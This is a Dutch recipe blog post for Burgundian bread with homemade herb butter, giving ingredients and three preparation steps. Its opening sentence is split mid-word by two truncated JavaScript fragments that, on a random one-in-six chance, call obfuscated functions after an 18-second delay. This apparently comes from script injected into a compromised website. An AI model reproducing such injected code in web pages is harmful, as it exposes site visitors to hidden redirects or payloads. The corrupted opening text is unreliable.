Een ouderwets sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokbroodje met kruidenboter, maar dan net iets anders. Altijd goed om de honger iets te stillen voor een etentje. Maak vooral een grote schaal, want deze boter kun je daarna ook gebruiken om in te bakken!
Wat heb je nodig?
– 200 gram roomboter
– Zeezout
– Korianderzaad
– Verse bladpeterselie
– Verse Bieslook
– 100 gram smeerkaas
– 2 teentjes wilde knoflook
Aan de slag!
- Smelt de boter een klein beetje in de magnetron (1 minuutje op 600 watt). Zo kun je alle ingrediënten makkelijk door de boter mengen.
- Hak alle ingrediënten in de hakmolen fijn en meng dit door het botermengsel.
- Zet de kruidenboter terug in de koelkast en haal net iets voor serveren uit de koelkast om op kamertemperatuur te komen.
Zelf vind ik het erg lekker om bourgondisch brood van de bakker te serveren. Ongesneden zodat je zelf mooie plakken kan snijden! Eet smakelijk!

Geen Reacties op "Bourgondisch brood met kruidenboter"